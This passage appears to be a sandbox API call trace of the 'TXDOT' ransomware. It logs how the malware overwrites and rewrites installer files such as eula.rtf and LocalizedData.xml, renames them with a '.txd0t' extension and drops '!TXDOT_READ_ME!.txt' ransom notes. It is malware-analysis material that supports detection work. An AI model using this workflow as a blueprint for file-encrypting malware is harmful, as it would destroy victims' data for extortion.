dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.684] WriteFile (in: hFile=0x478, lpBuffer=0x414f6b4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f6b0, lpOverlapped=0x0 | out: lpBuffer=0x414f6b4*, lpNumberOfBytesWritten=0x414f6b0*=0x2, lpOverlapped=0x0) returned 1 [0085.685] FlushFileBuffers (hFile=0x478) returned 1 [0085.687] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f6b0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f6b0*=0x7f0, lpOverlapped=0x0) returned 1 [0085.688] FlushFileBuffers (hFile=0x478) returned 1 [0085.689] CloseHandle (hObject=0x478) returned 1 [0085.689] GetProcessHeap () returned 0xe30000 [0085.689] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.689] CloseHandle (hObject=0x460) returned 1 [0085.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t")) returned 1 [0085.690] SetEvent (hEvent=0x404) returned 1 [0085.690] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.690] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0085.690] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t" [0085.690] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t") returned 0 [0085.690] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.691] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.691] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=82962) returned 1 [0085.691] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.691] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.693] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb9ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.693] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x14410, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x14410, lpOverlapped=0x0) returned 1 [0085.695] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffebbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.695] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x14410, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x14410, lpOverlapped=0x0) returned 1 [0085.695] FlushFileBuffers (hFile=0x460) returned 1 [0085.825] GetProcessHeap () returned 0xe30000 [0085.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.825] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0085.825] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="LocalizedData.xml" [0085.825] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.825] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt") returned 1 [0085.826] GetProcessHeap () returned 0xe30000 [0085.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.826] CloseHandle (hObject=0x460) returned 1 [0085.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.txd0t")) returned 1 [0085.826] SetEvent (hEvent=0x404) returned 1 [0085.826] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.827] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" [0085.827] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t" [0085.827] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t") returned 0 [0085.827] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.827] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.827] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=10125) returned 1 [0085.827] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.827] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.829] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffd673, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.829] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x2780, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0x2780, lpOverlapped=0x0) returned 1 [0085.830] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffd880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.830] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x2780, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0x2780, lpOverlapped=0x0) returned 1 [0085.830] FlushFileBuffers (hFile=0x460) returned 1 [0085.985] GetProcessHeap () returned 0xe30000 [0085.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.985] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" [0085.985] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="eula.rtf" [0085.985] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.985] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt") returned 1 [0085.986] GetProcessHeap () returned 0xe30000 [0085.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.986] CloseHandle (hObject=0x460) returned 1 [0085.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t")) returned 1 [0085.986] SetEvent (hEvent=0x404) returned 1 [0085.986] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0085.988] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0085.988] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t" [0085.988] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t") returned 0 [0085.988] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.988] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.988] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=79296) returned 1 [0085.988] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.988] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0085.990] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffec840, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.990] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x135c0, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x135c0, lpOverlapped=0x0) returned 1 [0085.993] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeca40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.993] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x135c0, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x135c0, lpOverlapped=0x0) returned 1 [0085.994] FlushFileBuffers (hFile=0x460) returned 1 [0086.177] GetProcessHeap () returned 0xe30000 [0086.177] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.192] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0086.199] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="LocalizedData.xml" [0086.200] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.200] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt") returned 1 [0086.207] GetProcessHeap () returned 0xe30000 [0086.207] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.210] CloseHandle (hObject=0x460) returned 1 [0086.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.txd0t")) returned 1 [0086.237] SetEvent (hEvent=0x404) returned 1 [0086.240] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0086.241] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0086.241] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t" [0086.241] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t") returned 0 [0086.272] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.290] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.290] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=81482) returned 1 [0086.290] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.290] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0086.426] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffebfb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.426] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13e40, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x13e40, lpOverlapped=0x0) returned 1 [0086.432] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffec1c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.432] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13e40, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x13e40, lpOverlapped=0x0) returned 1 [0086.432] FlushFileBuffers (hFile=0x464) returned 1 [0086.621] GetProcessHeap () returned 0xe30000 [0086.621] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.621] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0086.621] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="LocalizedData.xml" [0086.621] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.621] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt") returned 1 [0086.621] GetProcessHeap () returned 0xe30000 [0086.621] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.621] CloseHandle (hObject=0x464) returned 1 [0086.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.txd0t")) returned 1 [0086.622] SetEvent (hEvent=0x404) returned 1 [0086.622] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0086.629] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0086.629] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t" [0086.629] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t") returned 0 [0086.629] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.634] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0086.634] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=80254) returned 1 [0086.634] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.634] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0086.641] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec482, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.641] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13970, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x13970, lpOverlapped=0x0) returned 1 [0086.652] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec690, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.652] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13970, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x13970, lpOverlapped=0x0) returned 1 [0086.653] FlushFileBuffers (hFile=0x474) returned 1 [0086.736] GetProcessHeap () returned 0xe30000 [0086.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.736] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0086.736] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="LocalizedData.xml" [0086.736] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.736] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt") returned 1 [0086.736] GetProcessHeap () returned 0xe30000 [0086.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.736] CloseHandle (hObject=0x474) returned 1 [0086.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.txd0t")) returned 1 [0086.737] SetEvent (hEvent=0x404) returned 1 [0086.737] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0086.740] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" [0086.740] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t" [0086.740] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t") returned 0 [0086.740] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.740] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0086.740] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=3069) returned 1 [0086.740] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.740] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0086.746] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff203, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.746] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0xbf0, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0xbf0, lpOverlapped=0x0) returned 1 [0086.746] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff410, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.746] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0xbf0, lpOverlapped=0x0) returned 1 [0086.747] FlushFileBuffers (hFile=0x474) returned 1 [0086.754] GetProcessHeap () returned 0xe30000 [0086.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.754] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" [0086.754] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="eula.rtf" [0086.754] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.754] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt") returned 0 [0086.754] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\3082\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0086.773] WriteFile (in: hFile=0x468, lpBuffer=0x414f6b4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f6b0, lpOverlapped=0x0 | out: lpBuffer=0x414f6b4*, lpNumberOfBytesWritten=0x414f6b0*=0x2, lpOverlapped=0x0) returned 1 [0086.774] FlushFileBuffers (hFile=0x468) returned 1 [0086.786] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f6b0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f6b0*=0x7f0, lpOverlapped=0x0) returned 1 [0086.788] FlushFileBuffers (hFile=0x468) returned 1 [0086.828] CloseHandle (hObject=0x468) returned 1 [0086.840] GetProcessHeap () returned 0xe30000 [0086.840] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.840] CloseHandle (hObject=0x474) returned 1 [0086.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t" (normalized: 